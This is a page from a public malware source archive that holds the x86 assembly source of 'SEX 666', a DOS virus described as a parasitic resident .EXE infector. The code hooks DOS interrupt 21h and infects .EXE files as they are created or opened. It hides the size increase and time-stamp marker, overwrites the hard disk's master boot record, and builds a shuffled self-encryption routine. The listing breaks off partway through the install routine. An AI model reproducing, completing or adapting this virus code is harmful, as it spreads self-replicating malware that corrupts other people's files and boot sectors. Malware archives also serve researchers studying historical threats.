mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
1070 lines
23 KiB
NASM
1070 lines
23 KiB
NASM
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Virus Name: SEX 666
|
|||
|
; Origin: Holland
|
|||
|
; Eff Length: 2,048 bytes
|
|||
|
; Type Code: PRhE - Parasitic Resident .EXE Infector
|
|||
|
;
|
|||
|
; General Comments:
|
|||
|
; When the first program with SEX 666 is executed, SEX 666 will infect
|
|||
|
; this partition table the first harddisk and install itself resident
|
|||
|
; at the top of system memory, but below the 640k DOS boundary. Free
|
|||
|
; memory as indicated by the DOS CHKDSK program, will decrease by 4112
|
|||
|
; bytes. Interrupt 21h will be hooked by the virus.
|
|||
|
;
|
|||
|
; This first time the computer is booted from the first harddisk SEX 666
|
|||
|
; will install itself resident above TOM but below the 640k DOS boundary.
|
|||
|
; Total system memory as indicated by the DOS CHKDSK program, will
|
|||
|
; decrease by 4096 bytes.
|
|||
|
;
|
|||
|
; After SEX 666 is resident, it will infect .EXE programs that are
|
|||
|
; created with dos function 3ch or 5bh. Infected programs will increase
|
|||
|
; in size by 2048 bytes, though the increase in file length will be
|
|||
|
; hidden if SEX 666 is resident. The program's time will indicate 62
|
|||
|
; seconds, but this will be hidden if the virus is resident.
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Interrupt vectors
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
iseg segment at 0
|
|||
|
org 1ch*4
|
|||
|
|
|||
|
Int1Co dw 0 ; interrupt vector 21h
|
|||
|
Int1Cs dw 0
|
|||
|
|
|||
|
org 21h*4
|
|||
|
|
|||
|
Int21o dw 0 ; interrupt vector 21h
|
|||
|
Int21s dw 0
|
|||
|
|
|||
|
iseg ends
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Constants
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
VirusSize equ 800h ; size of virus
|
|||
|
BootSize equ 2bh
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Macros
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
je_n macro dest ; je >128 bytes
|
|||
|
local ok
|
|||
|
jne ok
|
|||
|
jmp dest
|
|||
|
ok:
|
|||
|
endm
|
|||
|
|
|||
|
jne_n macro dest ; jne >128 bytes
|
|||
|
local ok
|
|||
|
je ok
|
|||
|
jmp dest
|
|||
|
ok:
|
|||
|
endm
|
|||
|
|
|||
|
dbw macro _byte1,_byte2,_word
|
|||
|
db _byte1,_byte2
|
|||
|
dw offset _word
|
|||
|
endm
|
|||
|
|
|||
|
cseg segment public 'code'
|
|||
|
assume cs:cseg,ds:cseg,es:cseg
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Header of EXE-file
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
Header equ $
|
|||
|
|
|||
|
Signature dw 5a4dh ; signature 'MZ'
|
|||
|
PartPage dw 0 ; size of partitial page
|
|||
|
PageCount dw 8 ; number of pages
|
|||
|
ReloCount dw 0 ; number of relocation items
|
|||
|
HeaderSize dw 2 ; size of header
|
|||
|
MinMem dw 40h ; minimum memory needed
|
|||
|
MaxMem dw 40h ; maximum memory needed
|
|||
|
ExeSS dw 0 ; initial SS
|
|||
|
ExeSP dw VirusSize ; initial SP
|
|||
|
CheckSum dw 0 ; unused ???
|
|||
|
ExeEntry equ this dword ; initial entry point
|
|||
|
ExeIP dw offset Start ; initial IP
|
|||
|
ExeCS dw 0 ; initial CS
|
|||
|
ReloOffset dw 1ch ; offset of relocationtable
|
|||
|
OverlayNr dw 0 ; number of overlay
|
|||
|
|
|||
|
CryptOfs equ OverlayNr ; offset Crypt
|
|||
|
org BootSize
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Bootsector startup
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
Bootsector:
|
|||
|
cli
|
|||
|
xor bx,bx
|
|||
|
mov ds,bx
|
|||
|
mov ss,bx
|
|||
|
mov sp,7c00h
|
|||
|
sti
|
|||
|
mov ax,ds:[413h]
|
|||
|
sub ax,(VirusSize/400h)
|
|||
|
mov ds:[413h],ax
|
|||
|
mov cl,6
|
|||
|
shl ax,cl
|
|||
|
mov es,ax
|
|||
|
mov ax,201h+(VirusSize/200h)
|
|||
|
mov cx,2
|
|||
|
mov dx,80h
|
|||
|
int 13h
|
|||
|
mov bx,offset StartUp
|
|||
|
push es
|
|||
|
push bx
|
|||
|
retf
|
|||
|
|
|||
|
StartUp:cli
|
|||
|
mov ax,offset Interrupt1C
|
|||
|
xchg ax,ds:Int1Co
|
|||
|
mov cs:OldInt1Co,ax
|
|||
|
mov ax,cs
|
|||
|
xchg ax,ds:Int1Cs
|
|||
|
mov cs:OldInt1Cs,ax
|
|||
|
mov cs:Count,182
|
|||
|
sti
|
|||
|
push ds
|
|||
|
pop es
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov si,offset Header
|
|||
|
mov di,7c00h
|
|||
|
mov cx,BootSize
|
|||
|
cld
|
|||
|
rep movsb
|
|||
|
mov bx,7c00h
|
|||
|
push es
|
|||
|
push bx
|
|||
|
retf
|
|||
|
|
|||
|
Interrupt1C:
|
|||
|
dec cs:Count
|
|||
|
jne Old1C
|
|||
|
push ds
|
|||
|
push ax
|
|||
|
cli
|
|||
|
xor ax,ax
|
|||
|
mov ds,ax
|
|||
|
mov ax,cs:OldInt1Co
|
|||
|
mov ds:Int1Co,ax
|
|||
|
mov ax,cs:OldInt1Cs
|
|||
|
mov ds:Int1Cs,ax
|
|||
|
mov ax,offset Interrupt21
|
|||
|
xchg ax,ds:Int21o
|
|||
|
mov cs:OldInt21o,ax
|
|||
|
mov ax,cs
|
|||
|
xchg ax,ds:Int21s
|
|||
|
mov cs:OldInt21s,ax
|
|||
|
mov cs:Handle1,0
|
|||
|
mov cs:Handle2,0
|
|||
|
sti
|
|||
|
pop ax
|
|||
|
pop ds
|
|||
|
Old1C: jmp cs:OldInt1C
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Manipilated functions
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
Functions db 11h ; 1
|
|||
|
dw offset FindFCB
|
|||
|
db 12h ; 2
|
|||
|
dw offset FindFCB
|
|||
|
db 30h ; 3
|
|||
|
dw offset Version
|
|||
|
db 3ch ; 4
|
|||
|
dw offset Create
|
|||
|
db 3dh ; 5
|
|||
|
dw offset Open
|
|||
|
db 3eh ; 6
|
|||
|
dw offset Close
|
|||
|
db 42h ; 7
|
|||
|
dw offset Seek
|
|||
|
db 4bh ; 8
|
|||
|
dw offset Exec
|
|||
|
db 4eh ; 9
|
|||
|
dw offset Find
|
|||
|
db 4fh ; a
|
|||
|
dw offset Find
|
|||
|
db 5bh ; b
|
|||
|
dw offset Create
|
|||
|
db 6ch ; c
|
|||
|
dw offset OpenCreate
|
|||
|
|
|||
|
FunctionCount equ 0ch
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; String data
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
MemoryMsg db 'Insufficient memory',13,10,'$'
|
|||
|
|
|||
|
ChkDsk db 'CHKDSK'
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Procedure to infect an EXE-file
|
|||
|
; At the top of the EXE-file must be space to put the virus.
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
Infect: push ax ; save registers
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push ds
|
|||
|
push cs ; ds=cs
|
|||
|
pop ds
|
|||
|
mov ax,4200h ; position read/write pointer
|
|||
|
xor cx,cx ; at the end of the virus
|
|||
|
mov dx,VirusSize
|
|||
|
call DOS
|
|||
|
call ReadHeader ; read orginal exe-header
|
|||
|
add PageCount,VirusSize/200h ; adjust header for virus
|
|||
|
mov ReloCount,0
|
|||
|
mov HeaderSize,0
|
|||
|
add MinMem,(10h+VirusSize)/10h
|
|||
|
add MaxMem,(10h+VirusSize)/10h
|
|||
|
jnc MaxOk
|
|||
|
mov MaxMem,0ffffh
|
|||
|
MaxOk: add ExeSS,VirusSize/10h
|
|||
|
mov ExeIP,offset Main
|
|||
|
mov ExeCS,0
|
|||
|
mov ax,4200h ; position read/write pointer
|
|||
|
xor cx,cx ; at the top of the virus
|
|||
|
xor dx,dx
|
|||
|
call DOS
|
|||
|
call WriteHeader ; write header at the top of
|
|||
|
jc InfErr
|
|||
|
mov ax,5700h ; the virus
|
|||
|
call DOS
|
|||
|
mov ax,5701h
|
|||
|
or cl,1fh
|
|||
|
call DOS
|
|||
|
InfErr: pop ds ; restore registers
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
ret ; return
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; The orginal interrupt 21h is redirected to this procedure
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
FindFCB:call DOS ; call orginal interrupt
|
|||
|
cmp al,0 ; error ?
|
|||
|
jne Ret1
|
|||
|
pushf ; save registers
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push es
|
|||
|
mov ah,2fh ; get DTA
|
|||
|
call DOS
|
|||
|
cmp byte ptr es:[bx],-1 ; extended fcb ?
|
|||
|
jne FCBOk
|
|||
|
add bx,8 ; yes, skip 8 bytes
|
|||
|
FCBOk: mov al,es:[bx+16h] ; get file-time (low byte)
|
|||
|
and al,1fh ; seconds
|
|||
|
cmp al,1fh ; 62 seconds ?
|
|||
|
jne FileOk ; no, file not infected
|
|||
|
sub word ptr es:[bx+1ch],VirusSize ; adjust file-size
|
|||
|
sbb word ptr es:[bx+1eh],0
|
|||
|
jmp short Time
|
|||
|
|
|||
|
Find: call DOS ; call orginal interrupt
|
|||
|
jc Ret1 ; error ?
|
|||
|
pushf ; save registers
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push es
|
|||
|
mov ah,2fh
|
|||
|
call DOS
|
|||
|
mov al,es:[bx+16h] ; get file-time (low byte)
|
|||
|
and al,1fh ; seconds
|
|||
|
cmp al,1fh ; 62 seconds ?
|
|||
|
jne FileOk ; no, file not infected
|
|||
|
sub word ptr es:[bx+1ah],VirusSize ; change file-size
|
|||
|
sbb word ptr es:[bx+1ch],0
|
|||
|
Time: xor byte ptr es:[bx+16h],10h ; adjust file-time
|
|||
|
FileOk: pop es ; restore registers
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
popf
|
|||
|
Ret1: retf 2 ; return
|
|||
|
|
|||
|
Version:push cx ; installation check
|
|||
|
push si ; ds = cs
|
|||
|
push di
|
|||
|
push es
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
mov si,offset Version ; compare an part of the
|
|||
|
mov di,si ; code segment with the code
|
|||
|
mov cx,VersionSize ; segment of the virus
|
|||
|
cld
|
|||
|
repe cmpsb
|
|||
|
pop es
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
pop cx
|
|||
|
jne Old21 ; not equal, do orginal int 21h
|
|||
|
mov ax,0DEADh ; return DEAD signature
|
|||
|
mov bx,offset Continue ; es:dx = continue
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
retf 2 ; return
|
|||
|
|
|||
|
VersionSize equ $-Version
|
|||
|
|
|||
|
Seek: or bx,bx ; bx=0 ?
|
|||
|
jz Old21 ; yes, do orginal interrupt
|
|||
|
cmp bx,cs:Handle1 ; bx=handle1 ?
|
|||
|
je Stealth ; yes, use stealth
|
|||
|
cmp bx,cs:Handle2 ; bx=handle2 ?
|
|||
|
jne Old21 ; no, do orginal interrupt
|
|||
|
Stealth:push cx ; save cx
|
|||
|
or al,al ; seek from top of file ?
|
|||
|
jnz Ok ; no, don't change cx:dx
|
|||
|
add dx,VirusSize ; change cx:dx
|
|||
|
adc cx,0
|
|||
|
Ok: call DOS ; Execute orginal int 21h
|
|||
|
pop cx ; restore cx
|
|||
|
jc Ret1 ; Error ?
|
|||
|
sub ax,VirusSize ; adjust dx:ax
|
|||
|
sbb dx,0
|
|||
|
jmp short Ret1 ; return
|
|||
|
|
|||
|
Close: or bx,bx ; bx=0 ?
|
|||
|
je Old21 ; yes, do orginal interrupt
|
|||
|
cmp bx,cs:Handle1 ; bx=handle1
|
|||
|
jne Not1 ; no, check handle2
|
|||
|
call Infect ; finish infection
|
|||
|
mov cs:Handle1,0 ; handle1=unused
|
|||
|
Not1: cmp bx,cs:Handle2 ; bx=handle2
|
|||
|
jne Not2 ; no, do orginal interrupt
|
|||
|
call Infect
|
|||
|
mov cs:Handle2,0 ; handle2=unused
|
|||
|
Not2: jmp short Old21 ; continue with orginal int
|
|||
|
|
|||
|
Interrupt21:
|
|||
|
cmp cs:Disable,0
|
|||
|
jne Old21
|
|||
|
push bx ; after an int 21h instruction
|
|||
|
push cx ; this procedure is started
|
|||
|
mov bx,offset Functions
|
|||
|
mov cx,FunctionCount
|
|||
|
NxtFn: cmp ah,cs:[bx] ; search function
|
|||
|
je Found
|
|||
|
add bx,3
|
|||
|
loop NxtFn
|
|||
|
pop cx ; function not found
|
|||
|
pop bx
|
|||
|
Old21: inc cs:Cryptor
|
|||
|
jmp cs:OldInt21
|
|||
|
|
|||
|
Found: push bp ; function found, start viral
|
|||
|
mov bp,sp ; version of function
|
|||
|
mov bx,cs:[bx+1]
|
|||
|
xchg bx,ss:[bp+4]
|
|||
|
pop bp
|
|||
|
pop cx
|
|||
|
ret
|
|||
|
|
|||
|
Create: cmp cs:Handle1,0 ; handle1=0 ?
|
|||
|
jne Old21 ; No, can't do anything
|
|||
|
call CheckName ; check for .exe extension
|
|||
|
jc Old21 ; No, not an exe-file
|
|||
|
ExtCr: call DOS ; Execute orginal interrupt
|
|||
|
jc Ret2 ; Error ?
|
|||
|
pushf ; save registers
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push si
|
|||
|
push di
|
|||
|
push ds
|
|||
|
push es
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
mov bx,ax ; write virus to file
|
|||
|
mov ax,4400h
|
|||
|
call DOS
|
|||
|
jc InRet
|
|||
|
test dx,80h
|
|||
|
jnz InRet
|
|||
|
push bx
|
|||
|
call Link
|
|||
|
pop bx
|
|||
|
mov si,offset WriteVirus
|
|||
|
mov di,offset Header
|
|||
|
mov cx,1ah
|
|||
|
rep movsb
|
|||
|
mov CryptOfs,offset Crypt
|
|||
|
call Header
|
|||
|
jc InErr ; Error ?
|
|||
|
cmp ax,cx
|
|||
|
jne InErr
|
|||
|
mov Handle1,bx ; store handle
|
|||
|
jmp short InRet
|
|||
|
InErr: mov ax,4200h ; set read/write pointer to top
|
|||
|
xor cx,cx ; of file
|
|||
|
xor dx,dx
|
|||
|
call DOS
|
|||
|
mov ah,40h
|
|||
|
xor cx,cx
|
|||
|
call DOS
|
|||
|
InRet: pop es ; restore registers
|
|||
|
pop ds
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
popf
|
|||
|
Ret2: retf 2 ; return
|
|||
|
|
|||
|
OpenCreate:
|
|||
|
or al,al ; subfunction 0 ?
|
|||
|
jne Fail ; no, do orginal interrupt
|
|||
|
push dx
|
|||
|
and dl,0f0h
|
|||
|
cmp dl,020h
|
|||
|
pop dx
|
|||
|
je Replace
|
|||
|
push ax ; save registers
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
mov ax,3d00h ; open file and close file to
|
|||
|
mov dx,si ; check if file exists
|
|||
|
call DOS
|
|||
|
jc Error
|
|||
|
mov bx,ax
|
|||
|
mov ah,3eh
|
|||
|
call DOS
|
|||
|
Error: pop dx ; restore registers
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
jnc Open ; open file, if file exists
|
|||
|
Replace:cmp cs:Handle1,0 ; is handle1 0 ?
|
|||
|
jne Fail ; no, do orginal interrupt
|
|||
|
push dx ; save dx
|
|||
|
mov dx,si
|
|||
|
call CheckName ; check for .exe extension
|
|||
|
pop dx ; restore dx
|
|||
|
jc Fail
|
|||
|
jmp ExtCr ; create if exe-file
|
|||
|
Fail: jmp Old21 ; do orginal interrupt
|
|||
|
|
|||
|
Open: cmp al,1
|
|||
|
je Fail
|
|||
|
cmp cs:Handle2,0 ; handle1=0 ?
|
|||
|
jne Fail ; No, can't do anything
|
|||
|
call DOS ; Execute orginal interrupt
|
|||
|
jc Ret3 ; Error ?
|
|||
|
pushf ; save registers
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push ds
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov bx,ax ; read header of file
|
|||
|
Ext2: mov ax,4400h
|
|||
|
call DOS
|
|||
|
jc Device
|
|||
|
test dx,80h
|
|||
|
jnz Device
|
|||
|
mov ah,3fh
|
|||
|
mov cx,1ch
|
|||
|
xor dx,dx
|
|||
|
call DOS
|
|||
|
jc NoVir ; error ?
|
|||
|
cmp ax,cx
|
|||
|
jne NoVir
|
|||
|
cmp Signature,5a4dh ; signature = 'MZ' ?
|
|||
|
jne NoVir ; no, not infected
|
|||
|
cmp HeaderSize,0 ; headersize = 0 ?
|
|||
|
jne NoVir ; no, not infected
|
|||
|
cmp ExeIP,offset Main ; ip = Start ?
|
|||
|
jne NoVir ; no, not infected
|
|||
|
cmp ExeCS,0 ; cx = 0 ?
|
|||
|
jne NoVir ; no, not infected
|
|||
|
mov Handle2,bx ; store handle
|
|||
|
mov ax,4200h
|
|||
|
xor cx,cx
|
|||
|
mov dx,VirusSize ; seek to end of virus
|
|||
|
jmp OpenOk
|
|||
|
NoVir: mov ax,4200h
|
|||
|
xor cx,cx
|
|||
|
xor dx,dx
|
|||
|
OpenOk: call DOS
|
|||
|
Device: pop ds ; restore registers
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
popf
|
|||
|
Ret3: retf 2 ; return
|
|||
|
|
|||
|
Exec: push ax
|
|||
|
push cx
|
|||
|
push si
|
|||
|
push di
|
|||
|
mov si,dx
|
|||
|
mov di,offset ChkDsk
|
|||
|
mov cx,100h
|
|||
|
Next7: jcxz NotChk
|
|||
|
mov ah,cs:[di]
|
|||
|
Next8: lodsb
|
|||
|
and al,0dfh
|
|||
|
cmp al,ah
|
|||
|
loopne Next8
|
|||
|
push cx
|
|||
|
push si
|
|||
|
push di
|
|||
|
mov cx,6
|
|||
|
dec si
|
|||
|
Next9: lodsb
|
|||
|
and al,0dfh
|
|||
|
inc di
|
|||
|
cmp cs:[di-1],al
|
|||
|
loope Next9
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
pop cx
|
|||
|
jne Next7
|
|||
|
cmp cs:Cryptor,1000h
|
|||
|
jae NoMsg
|
|||
|
push dx
|
|||
|
push ds
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov ah,9
|
|||
|
mov dx,offset TextLine
|
|||
|
call DOS
|
|||
|
mov ah,9
|
|||
|
mov dx,offset Message
|
|||
|
call DOS
|
|||
|
pop ds
|
|||
|
pop dx
|
|||
|
NoMsg: pop di
|
|||
|
pop si
|
|||
|
pop cx
|
|||
|
pop ax
|
|||
|
inc cs:Disable
|
|||
|
call DOS
|
|||
|
dec cs:Disable
|
|||
|
jmp Ret3
|
|||
|
NotChk: pop di
|
|||
|
pop si
|
|||
|
pop cx
|
|||
|
pop ax
|
|||
|
jmp Old21
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
WriteVirus:
|
|||
|
call CryptOfs ; encrypt
|
|||
|
mov ah,40h ; write virus to file
|
|||
|
mov cx,VirusSize
|
|||
|
xor dx,dx
|
|||
|
pushf
|
|||
|
call cs:OldInt21
|
|||
|
call CryptOfs ; decrypt
|
|||
|
ret ; return
|
|||
|
|
|||
|
WriteHeader: ; write exe-header to file
|
|||
|
mov ah,40h
|
|||
|
jmp short Hdr
|
|||
|
|
|||
|
ReadHeader: ; read exe-header from file
|
|||
|
mov ah,3fh
|
|||
|
Hdr: mov cx,1ch
|
|||
|
xor dx,dx
|
|||
|
|
|||
|
DOS: pushf ; call orginal interrupt
|
|||
|
call cs:OldInt21
|
|||
|
ret
|
|||
|
|
|||
|
CheckName: ; check for .exe
|
|||
|
push ax ; save registers
|
|||
|
push cx
|
|||
|
push si
|
|||
|
push di
|
|||
|
xor ah,ah ; point found = 0
|
|||
|
mov cx,100h ; max length filename = 100h
|
|||
|
mov si,dx ; si = start of filename
|
|||
|
cld
|
|||
|
NxtChr: lodsb ; get byte
|
|||
|
or al,al ; 0 ?
|
|||
|
je EndName ; yes, check extension
|
|||
|
cmp al,'\' ; \ ?
|
|||
|
je Slash ; yes, point found = 0
|
|||
|
cmp al,'.' ; . ?
|
|||
|
je Point ; yes, point found = 1
|
|||
|
loop NxtChr ; next character
|
|||
|
jmp EndName ; check extension
|
|||
|
Slash: xor ah,ah ; point found = 0
|
|||
|
jmp NxtChr ; next character
|
|||
|
Point: inc ah ; point found = 1
|
|||
|
mov di,si ; di = start of extension
|
|||
|
jmp NxtChr ; next character
|
|||
|
EndName:or ah,ah ; point found = 0
|
|||
|
je NotExe ; yes, not an exe-file
|
|||
|
mov si,di ; si = start of extension
|
|||
|
lodsw ; first 2 characters
|
|||
|
and ax,0dfdfh ; uppercase
|
|||
|
cmp ax,05845h ; EX ?
|
|||
|
jne NotExe ; no, not an exe-file
|
|||
|
lodsb ; 3rd character
|
|||
|
and al,0dfh ; uppercase
|
|||
|
cmp al,045h ; E ?
|
|||
|
je ChkRet ; yes, return
|
|||
|
NotExe: stc ; set carry flag
|
|||
|
ChkRet: pop di ; restore registers
|
|||
|
pop si
|
|||
|
pop cx
|
|||
|
pop ax
|
|||
|
ret ; return
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Linker for encryption procedure
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
Part1 db 7,0
|
|||
|
db 1, 09ch
|
|||
|
db 1, 050h
|
|||
|
db 1, 051h
|
|||
|
db 1, 052h
|
|||
|
db 1, 056h
|
|||
|
db 1, 057h
|
|||
|
db 1, 01eh
|
|||
|
Part2 db 4,0
|
|||
|
db 2, 00eh,01fh
|
|||
|
db 2, 031h,0c0h
|
|||
|
dbw 3, 0bah,Crypt-1ch
|
|||
|
dbw 3, 0bfh,[1ch]
|
|||
|
Part3 db 1,0
|
|||
|
db 3, 0fch,0ebh,00eh
|
|||
|
Part4 db 4,0
|
|||
|
db 1, 0ach
|
|||
|
db 2, 002h,0e0h
|
|||
|
db 2, 0d0h,0cch
|
|||
|
db 3, 030h,025h,047h
|
|||
|
Part5 db 1,0
|
|||
|
db 2, 0e2h,0f6h
|
|||
|
Part6 db 1,0
|
|||
|
db 4, 00bh,0d2h,074h,010h
|
|||
|
Part7 db 2,0
|
|||
|
dbw 3, 0beh,Crypt
|
|||
|
dbw 3, 0b9h,Lastbyte-Crypt
|
|||
|
Part8 db 1,0
|
|||
|
db 10, 03bh,0d1h,073h,002h,08bh
|
|||
|
db 0cah,02bh,0d1h,0ebh,0e2h
|
|||
|
Part9 db 7,1
|
|||
|
db 1, 09dh
|
|||
|
db 1, 058h
|
|||
|
db 1, 059h
|
|||
|
db 1, 05ah
|
|||
|
db 1, 05eh
|
|||
|
db 1, 05fh
|
|||
|
db 1, 01fh
|
|||
|
Part10 db 1,0
|
|||
|
db 1, 0c3h
|
|||
|
|
|||
|
|
|||
|
Link: mov ax,Cryptor
|
|||
|
mov cx,10 ; number of parts
|
|||
|
mov di,offset Crypt ; destenation
|
|||
|
mov si,offset Part1 ; source
|
|||
|
Next1: push ax ; save registers
|
|||
|
push cx
|
|||
|
push di
|
|||
|
cld
|
|||
|
cmp byte ptr ds:[si+1],0
|
|||
|
je Forward
|
|||
|
push ax
|
|||
|
push cx
|
|||
|
push si
|
|||
|
xor ax,ax
|
|||
|
mov cl,[si]
|
|||
|
xor ch,ch
|
|||
|
add si,2
|
|||
|
Next4: lodsb
|
|||
|
add si,ax
|
|||
|
add di,ax
|
|||
|
loop Next4
|
|||
|
dec di
|
|||
|
std
|
|||
|
pop si
|
|||
|
pop cx
|
|||
|
pop ax
|
|||
|
Forward:mov Table[0],0100h ; initialize table
|
|||
|
mov Table[2],0302h
|
|||
|
mov Table[4],0504h
|
|||
|
mov Table[6],0706h
|
|||
|
mov bx,offset Table
|
|||
|
mov cl,ds:[si] ; get number of instructions
|
|||
|
xor ch,ch ; to shuffle
|
|||
|
Next2: call Shuffle
|
|||
|
loop Next2
|
|||
|
pop di
|
|||
|
mov cl,ds:[si] ; get next part
|
|||
|
xor ch,ch
|
|||
|
add si,2
|
|||
|
cld
|
|||
|
Next6: lodsb
|
|||
|
xor ah,ah
|
|||
|
add si,ax
|
|||
|
add di,ax
|
|||
|
loop Next6
|
|||
|
pop cx ; restore register
|
|||
|
pop ax
|
|||
|
loop Next1 ; next
|
|||
|
ret ; return
|
|||
|
|
|||
|
Shuffle:xor dx,dx ; shuffle instructions
|
|||
|
div cx
|
|||
|
push ax
|
|||
|
push cx
|
|||
|
push si
|
|||
|
xchg si,dx
|
|||
|
mov al,ds:[bx]
|
|||
|
xchg al,ds:[bx+si]
|
|||
|
xchg si,dx
|
|||
|
inc bx
|
|||
|
pushf
|
|||
|
cld
|
|||
|
mov cl,al
|
|||
|
xor ax,ax
|
|||
|
xor ch,ch
|
|||
|
add si,2
|
|||
|
jcxz First
|
|||
|
Next5: lodsb
|
|||
|
add si,ax
|
|||
|
loop Next5
|
|||
|
First: lodsb
|
|||
|
xor ah,ah
|
|||
|
mov cx,ax
|
|||
|
popf
|
|||
|
rep movsb
|
|||
|
pop si
|
|||
|
pop cx
|
|||
|
pop ax
|
|||
|
ret
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; This procedure is called when starting from an exe-file
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
MemErr: mov ah,9 ; display message
|
|||
|
mov dx,offset MemoryMsg
|
|||
|
int 21h
|
|||
|
mov ax,4cffh ; terminate with error-code 255
|
|||
|
int 21h
|
|||
|
|
|||
|
Start: mov cs:SavedAX,ax ; save registers
|
|||
|
mov cs:SavedDS,ds
|
|||
|
push cs ; ds = cs
|
|||
|
pop ds
|
|||
|
mov ah,30h ; get dos-version (installation
|
|||
|
int 21h ; check)
|
|||
|
cmp ax,0DEADh ; virus installed ?
|
|||
|
jne Install ; no, install
|
|||
|
cmp bx,offset Continue
|
|||
|
jne Install
|
|||
|
mov ax,ds:SavedAX
|
|||
|
mov es:SavedAX,ax
|
|||
|
mov ax,ds:SavedDS
|
|||
|
mov es:SavedDS,ax
|
|||
|
push es ; push es and dx for far return
|
|||
|
push bx
|
|||
|
mov ax,cs ; ax=distenation segment
|
|||
|
mov dx,cs ; dx=segment of orginal header
|
|||
|
add dx,VirusSize/10h
|
|||
|
retf ; start orginal exe-file
|
|||
|
Install:mov ah,4ah ; get memory avail
|
|||
|
mov bx,-1
|
|||
|
int 21h
|
|||
|
sub bx,(10h+VirusSize)/10h ; memory needed by virus
|
|||
|
mov ah,4ah ; adjust memory block-size
|
|||
|
int 21h
|
|||
|
jc MemErr ; error ? yes, terminate
|
|||
|
mov ah,48h ; allocate memory for virus
|
|||
|
mov bx,VirusSize/10h
|
|||
|
int 21h
|
|||
|
jc MemErr ; error ? yes, terminate
|
|||
|
mov es,ax
|
|||
|
mov ax,201h
|
|||
|
xor bx,bx
|
|||
|
mov cx,1
|
|||
|
mov dx,80h
|
|||
|
int 13h
|
|||
|
jc BootOk
|
|||
|
mov si,offset BootSector
|
|||
|
xor di,di
|
|||
|
mov cx,BootSize
|
|||
|
cld
|
|||
|
repe cmpsb
|
|||
|
je BootOk
|
|||
|
mov di,1beh+8
|
|||
|
mov cx,4
|
|||
|
Next3: cmp word ptr es:[di+2],0
|
|||
|
ja SectOk
|
|||
|
cmp word ptr es:[di],1+(VirusSize/200h)
|
|||
|
jbe BootOk
|
|||
|
SectOk: loop Next3
|
|||
|
push ds
|
|||
|
push es
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
xor si,si
|
|||
|
xor di,di
|
|||
|
mov cx,BootSize
|
|||
|
cld
|
|||
|
rep movsb
|
|||
|
mov ax,300h+(VirusSize/200h)
|
|||
|
mov cx,2
|
|||
|
int 13h
|
|||
|
pop es
|
|||
|
pop ds
|
|||
|
jc BootOk
|
|||
|
mov si,offset BootSector
|
|||
|
xor di,di
|
|||
|
mov cx,BootSize
|
|||
|
cld
|
|||
|
rep movsb
|
|||
|
mov ax,301h
|
|||
|
mov cx,1
|
|||
|
int 13h
|
|||
|
BootOk: mov ax,es
|
|||
|
dec ax ; get segment of MCB
|
|||
|
mov es,ax
|
|||
|
mov word ptr es:[1],8 ; change owner
|
|||
|
inc ax ; get segment of memory-block
|
|||
|
mov es,ax ; es:dx = continue
|
|||
|
mov dx,offset Continue
|
|||
|
push es ; push es and ds for far return
|
|||
|
